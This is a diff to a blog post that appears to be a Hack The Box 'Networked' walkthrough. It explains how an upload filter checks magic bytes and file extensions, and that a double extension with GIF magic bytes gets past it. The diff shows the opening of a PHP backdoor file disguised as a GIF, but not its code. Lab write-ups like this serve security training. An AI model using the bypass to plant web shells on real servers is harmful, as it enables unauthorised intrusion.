1n4r1/1n4r1.github.io/_posts/2019-11-18-Hackthebox-Networkd-Walkthrough.md

 ~~~

-_{% endhighlight %}
+{% endhighlight %}

-In summerize, they are just checking the following.
+In summerize, what "upload.php" is doing the followings.
+1. Check if the uploaded file is valid with "check_file_type()".
-1. Magic bytes of each file to be uploaded.
+2. "check_file_type()" checks the magic bytes of the file with "check_mime_type()".
-2. extension of each file to be uploaded.<br>
+3. Check the extension of the uploaded file
+4. If these are OK, move the uploaded file from the temporary directory to "/uploads"

-This means, by using double extention method, we can bypass the filter.
+This means, by using double extention method, with adding appropriate magic bytes, we can bypass the filter.
-{% highlight php %}
+{% highlight shell %}
 root@kali:~# cat simple-backdoor.php.gif
 GIF89a
 <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->